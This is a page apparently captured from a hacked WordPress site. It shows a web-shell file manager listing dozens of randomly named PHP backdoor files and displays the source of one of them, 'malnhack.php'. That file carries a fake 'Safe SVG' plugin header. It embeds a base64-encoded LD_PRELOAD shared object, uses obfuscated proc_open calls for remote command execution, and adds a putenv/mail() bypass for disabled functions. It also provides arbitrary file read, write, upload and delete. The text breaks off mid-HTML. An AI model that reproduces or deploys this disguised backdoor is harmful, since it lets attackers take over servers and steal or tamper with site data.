⚙ WordPress Media Library
File manager
📁 Media Files
📋 .htaccess
📋 .metadata
🔧 4005.php
🔧 about.php
🔧 bypassserv.php
🔧 edit-tags.php
🔧 eeveqowv.php
🔧 f350.php
🔧 ffroodtj.php
🔧 hdtzoepj.php
🔧 htmhytpn.php
🔧 ijnkwkfj.php
📋 images
🔧 index.php
🔧 inputs.php
🔧 install.php
🔧 jkdeeziz.php
🔧 jppfnovy.php
🔧 jskbyhrz.php
🔧 krdkjydm.php
📄 license.txt
🔧 lixgaldk.php
🔧 llzvlwze.php
🔧 mah.php
🔧 mainhackbypass.php
🔧 malnhack.php
🔧 mrlxxapf.php
🔧 njofsdtx.php
🔧 ntekbfld.php
🔧 ogorydam.php
📋 php.ini
🔧 postnews.php
🌐 readme.html
📄 robots.txt
🔧 root.php
🔧 rrvlfxop.php
🔧 sm.php
🔧 uadyesrt.php
🔧 whbziyxp.php
🔧 wnluxuft.php
🔧 wordfence-waf.php
🔧 wp-activate.php
📋 wp-admin
🔧 wp-blog-header.php
🔧 wp-comments-post.php
🔧 wp-config-sample.php
🔧 wp-config.php
📋 wp-content
🔧 wp-cron.php
📋 wp-includes
🔧 wp-links-opml.php
🔧 wp-load.php
🔧 wp-login.php
🔧 wp-mail.php
🔧 wp-settings.php
🔧 wp-signup.php
🔧 wp-trackback.php
🔧 xhfxrzih.php
🔧 xmlrpc.php
🔧 xyaqmwvg.php
🔧 yrelxoai.php
⬆️ Upload Media
Upload File
📝 Edit: malnhack.php
Size: 30.00 KB | Modified: 2025-11-18 00:13:04
<?php /** * Plugin Name: Safe SVG * Plugin URI: https://wordpress.org/plugins/safe-svg/ * Description: Enable SVG uploads and sanitize them to stop XML/SVG vulnerabilities in your WordPress website * Version: 2.3.2 * Requires at least: 6.6 * Requires PHP: 7.4 * Author: 10up * Author URI: https://10up.com * License: GPL-2.0-or-later * License URI: https://spdx.org/licenses/GPL-2.0-or-later.html * Text Domain: safe-svg * Domain Path: /languages * * @package safe-svg */ header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); $hook = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA4AcAAAAAAABAAAAAAAAAAPgZAAAAAAAAAAAAAEAAOAAHAEAAHQAcAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAoAAAAAAABsCgAAAAAAAAAAIAAAAAAAAQAAAAYAAAD4DQAAAAAAAPgNIAAAAAAA+A0gAAAAAABwAgAAAAAAAHgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAAB4CQAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA+A0AAAAAAAD4DSAAAAAAAPgNIAAAAAAACAIAAAAAAAAIAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAGhkFopFVPvXbYbBilBq7Sd8S1krAAAAAAMAAAANAAAAAQAAAAYAAACIwCBFAoRgGQ0AAAARAAAAEwAAAEJF1exgXb1c3muVgLvjknzYcVgcuY3xDurT7w4bn4gLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAASAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAALIAAAASAAAAAAAAAAAAAAAAAAAAAAAAAKMAAAASAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAFIAAAAiAAAAAAAAAAAAAAAAAAAAAAAAAJ4AAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUAAAAQABcAaBAgAAAAAAAAAAAAAAAAAI0AAAASAAwAFAkAAAAAAAApAAAAAAAAAKgAAAASAAwAPQkAAAAAAAAdAAAAAAAAANgAAAAQABgAcBAgAAAAAAAAAAAAAAAAAMwAAAAQABgAaBAgAAAAAAAAAAAAAAAAABAAAAASAAkAGAcAAAAAAAAAAAAAAAAAABYAAAASAA0AXAkAAAAAAAAAAAAAAAAAAHUAAAASAAwA4AgAAAAAAAA0AAAAAAAAAABfX2dtb25fc3RhcnRfXwBfaW5pdABfZmluaQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHB3bgBnZXRlbnYAY2htb2QAc3lzdGVtAGRhZW1vbml6ZQBzaWduYWwAZm9yawBleGl0AHByZWxvYWRtZQB1bnNldGVudgBsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4yLjUAAAAAAgAAAAIAAgAAAAIAAAACAAIAAAACAAIAAQABAAEAAQABAAEAAQABAAEAAAAAAABAAEAuwAAABAAAAAAAAAAdRppCQAAAgDdAAAAAAAAAPgNIAAAAAAACAAAAAAAAACwCAAAAAAAAAgOIAAAAAAACAAAAAAAAABwCAAAAAAAAGAQIAAAAAAACAAAAAAAAABgECAAAAAAAAAOIAAAAAAAAQAAAA8AAAAAAAAAAAAAANgPIAAAAAAABgAAAAIAAAAAAAAAAAAAAOAPIAAAAAAABgAAAAUAAAAAAAAAAAAAAOgPIAAAAAAABgAAAAcAAAAAAAAAAAAAAPAPIAAAAAAABgAAAAoAAAAAAAAAAAAAAPgPIAAAAAAABgAAAAsAAAAAAAAAAAAAABgQIAAAAAAABwAAAAEAAAAAAAAAAAAAACAQIAAAAAAABwAAAA4AAAAAAAAAAAAAACgQIAAAAAAABwAAAAMAAAAAAAAAAAAAADAQIAAAAAAABwAAABQAAAAAAAAAAAAAADgQIAAAAAAABwAAAAQAAAAAAAAAAAAAAEAQIAAAAAAABwAAAAYAAAAAAAAAAAAAAEgQIAAAAAAABwAAAAgAAAAAAAAAAAAAAFAQIAAAAAAABwAAAAkAAAAAAAAAAAAAAFgQIAAAAAAABwAAAAwAAAAAAAAAAAAAAEiD7AhIiwW9CCAASIXAdAL/0EiDxAjDAP810gggAP8l1AggAA8fQAD/JdIIIABoAAAAAOng/////yXKCCAAaAEAAADp0P////8lwgggAGgCAAAA6cD/////JboIIABoAwAAAOmw/////yWyCCAAaAQAAADpoP////8lqgggAGgFAAAA6ZD/////JaIIIABoBgAAAOmA/////yWaCCAAaAcAAADpcP////8lkgggAGgIAAAA6WD/////JSIIIABmkAAAAAAAAAAASI09gQggAEiNBYEIIABVSCn4SInlSIP4DnYVSIsF1gcgAEiFwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABIBQAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABoFAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYHAAAAAAAAVgcAAAAAAABmBwAAAAAAAHYHAAAAAAAAhgcAAAAAAACWBwAAAAAAAKYHAAAAAAAAtgcAAAAAAADGBwAAAAAAAGAQIAAAAAAAR0NDOiAoRGViaWFuIDYuMy4wLTE4K2RlYl91MSkgNi4zLjAgMjAxNzA1MTYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQDIAQAAAAAAAAAAAAAAAAAAAAAAAAMAAgDwAQAAAAAAAAAAAAAAAAAAAAAAAAMAAwA4AgAAAAAAAAAAAAAAAAAAAAAAAAMABAAwBAAAAAAAAAAAAAAAAAAAAAAAAAMABQAaBQAAAAAAAAAAAAAAAAAAAAAAAAMABgBIBQAAAAAAAAAAAAAAAAAAAAAAAAMABwBoBQAAAAAAAAAAAAAAAAAAAAAAAAMACABABgAAAAAAAAAAAAAAAAAAAAAAAAMACQAYBwAAAAAAAAAAAAAAAAAAAAAAAAMACgAwBwAAAAAAAAAAAAAAAAAAAAAAAAMACwDQBwAAAAAAAAAAAAAAAAAAAAAAAAMADADgBwAAAAAAAAAAAAAAAAAAAAAAAAMADQBcCQAAAAAAAAAAAAAAAAAAAAAAAAMADgBlCQAAAAAAAAAAAAAAAAAAAAAAAAMADwB4CQAAAAAAAAAAAAAAAAAAAAAAAAMAEACwCQAAAAAAAAAAAAAAAAAAAAAAAAMAEQD4DSAAAAAAAAAAAAAAAAAAAAAAAAMAEgAIDiAAAAAAAAAAAAAAAAAAAAAAAAMAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAMAFAAYDiAAAAAAAAAAAAAAAAAAAAAAAAMAFQDYDyAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAECAAAAAAAAAAAAAAAAAAAAAAAAMAFwBgECAAAAAAAAAAAAAAAAAAAAAAAAMAGABoECAAAAAAAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAGQAAAAIADADgBwAAAAAAAAAAAAAAAAAAGwAAAAIADAAgCAAAAAAAAAAAAAAAAAAALgAAAAIADABwCAAAAAAAAAAAAAAAAAAARAAAAAEAGABoECAAAAAAAAEAAAAAAAAAUwAAAAEAEgAIDiAAAAAAAAAAAAAAAAAAegAAAAIADACwCAAAAAAAAAAAAAAAAAAAhgAAAAEAEQD4DSAAAAAAAAAAAAAAAAAApQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAArAAAAAEAEABoCgAAAAAAAAAAAAAAAAAAugAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAxgAAAAEAFwBgECAAAAAAAAAAAAAAAAAA0wAAAAEAFAAYDiAAAAAAAAAAAAAAAAAA3AAAAAAADwB4CQAAAAAAAAAAAAAAAAAA7wAAAAEAFwBoECAAAAAAAAAAAAAAAAAA+wAAAAEAFgAAECAAAAAAAAAAAAAAAAAAEQEAABIAAAAAAAAAAAAAAAAAAAAAAAAAJQEAACAAAAAAAAAAAAAAAAAAAAAAAAAAQQEAABAAFwBoECAAAAAAAAAAAAAAA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'; function hunterEncryptDecrypt($input, $key="12") { $output = ''; for($i = 0; $i < strlen($input); $i++) { $output .= $input[$i] ^ $key[$i % strlen($key)]; } return $output; } function listing_all_directory() { $path = $_COOKIE['path'] ?: getcwd(); $result = array(); $date_format = "d-m-Y H:i:s"; if ($handle = opendir($path)) { while (false !== ($dir = readdir($handle))) { if ($dir === '.' || $dir === '..') { continue; } $full_path = "$path/$dir"; $is_dir = is_dir($full_path); $tmp_result = array( 'path' => htmlspecialchars($full_path), 'is_writable' => is_writable($full_path), 'is_dir' => $is_dir, 'date' => date($date_format, filemtime($full_path)), 'size' => $is_dir ? "" : round(filesize($full_path) / 1024, 2), ); $result[] = $tmp_result; } closedir($handle); } return $result; } $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : false; if(!$action) { main(); menu(); } function decode_char($string) { return hunterEncryptDecrypt(hex2bin($string)); } switch ($action) { case 'd': die(json_encode(listing_all_directory())); break; case 'r': if($_SERVER['REQUEST_METHOD'] == 'POST') { $data = json_decode(file_get_contents("php://input"), true); $content = show_base_data()($data['content']); $filename = decode_char($_COOKIE['filename']); $message['success'] = fm_write_file($filename, $content); die(json_encode($message)); } main(); $content = customize_read_file(decode_char($_COOKIE['filename'])) ; show_text_area(htmlspecialchars($content)); break; case 'cr': main(); show_text_area(""); break; case 'ul': $filename = decode_char($_COOKIE['filename']); if(show_un()($filename)) { $message['success'] = true; } else { $message['success'] = false; } die(json_encode($message)); break; case 'up': $file = $_FILES['import_file']; $tmp_name = $file['tmp_name']; $content = customize_read_file($tmp_name); if(isset($_POST['by'])) { $content = show_base_data()($content); } $path = $_COOKIE['path'] ?: getcwd(); $name = $file['name']; $destination = "$path/$name"; $message['success'] = $content && fm_write_file($destination, $content) ?: rename($tmp_name, $destination); die(json_encode($message)); break; case 're': $filename = decode_char($_COOKIE['filename']); $path = $_COOKIE['path']; if($_SERVER['REQUEST_METHOD'] == "POST") { $old_filename = "$path/$filename"; $new = $_POST['new']; $new_filename = "$path/$new"; $message['success'] = rename($old_filename, $new_filename); die(json_encode($message)); } break; case 'to': $filename = decode_char($_COOKIE['filename']); if($_SERVER['REQUEST_METHOD'] == 'POST') { $date = $_POST['date']; $str_date = strtotime($date); $message['success'] = touch($filename, $str_date); clearstatcache(true, $filename); die(json_encode($message)); } break; // --- START: New command cases --- case 'cmd_normal': if ($_SERVER['REQUEST_METHOD'] == 'POST') { $data = json_decode(file_get_contents("php://input"), true); $command = $data['cmd']; $pp = "p"."r"."o"."c"."_"."o"."p"."e"."n"; $pc = "f"."c"."l"."o"."s"."e"; $ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e"; $stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; $descriptorspec = [ 0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w'] ]; $process = $pp($command, $descriptorspec, $pipes); if (is_resource($process)) { $output = $stg($pipes[1]); $errors = $stg($pipes[2]); $pc($pipes[1]); $pc($pipes[2]); $ppc($process); if (!empty($errors)) { echo htmlspecialchars($errors); } else { echo htmlspecialchars($output); } } else { echo 'Error: Failed to execute command! The proc_open function might be disabled.'; } exit; } break; case 'cmd_bypass': if ($_SERVER['REQUEST_METHOD'] == 'POST') { $data = json_decode(file_get_contents("php://input"), true); $cmdd = $data['cmd']; $p = "p"."u"."t"."e"."n"."v"; $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s"; $m = "m"."a"."i"."l"; $base = "ba"."se"."64"."_"."de"."co"."de"; $en = "ba"."se"."64"."_"."en"."co"."de"; $drnm = "d"."i"."r"."n"."a"."m"."e"; $currentFilePath = $_SERVER['PHP_SELF']; $doc = $_SERVER['DOCUMENT_ROOT']; $directoryPath = $drnm($currentFilePath); $full = $doc . $directoryPath; $so_path = $full . '/chankro.so'; $socket_path = $full . '/acpid.socket'; @$a($so_path, $base($hook)); $command_to_run = $cmdd." > test.txt"; $meterpreter = $en($command_to_run); @$a($socket_path, $base($meterpreter)); @$p('CHANKRO=' . $socket_path); @$p('LD_PRELOAD=' . $so_path); @$m('a','a','a','a'); $response = 'Bypass command sent.\n\n' . 'Result written to: test.txt in the script\'s directory.\n' . 'Refresh the file list to see it.\n\n' . 'NOTE: This method requires write permissions and the mail() & putenv() functions to be enabled.'; echo $response; exit; } break; // --- END: New command cases --- default: break; } function customize_read_file($file) { if(!file_exists($file) || filesize($file) === 0) { return ''; } $content = @file_get_contents($file); if ($content !== false) { return $content; } $handle = @fopen($file, 'r'); if($handle) { $content = @fread($handle, filesize($file)); @fclose($handle); if($content) { return $content; } } return ''; } function show_file_contents() { $file = "file_"; $old = "get_"; $contents = "contents"; return "$file$old$contents"; } function show_text_area($content) { $filename = decode_char($_COOKIE['filename']); echo " <p><a href='?' id='back_menu'>< Back</a></p> <p>$filename</p> <textarea width='100%' id='content' cols='20' rows='30' style='margin-top: 10px'>$content</textarea> <button type='submit' class='textarea-button' onclick='textarea_handle()'>Submit</button> "; } function show_base_data() { $alvian = "base"; $nadir = "64_decode"; return "$alvian$nadir"; } function fm_write_file($file, $content) { if (function_exists('file_put_contents')) { if (@file_put_contents($file, $content) !== false) { return true; } } if (function_exists('fopen')) { $handle = @fopen($file, 'w'); if ($handle) { if (@fwrite($handle, $content) !== false) { @fclose($handle); return true; } @fclose($handle); } } return false; } function fm_make_request($url) { if(function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); return $output; } return show_file_contents()($url); } function show_un() { $link = "link"; $unpad = "un"; return "$unpad$link"; } function main() { global $current_path; $current_path = isset($_COOKIE['path']) ? $_COOKIE['path'] : false; if(!$current_path) { setcookie("path", getcwd()); $current_path = getcwd(); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta 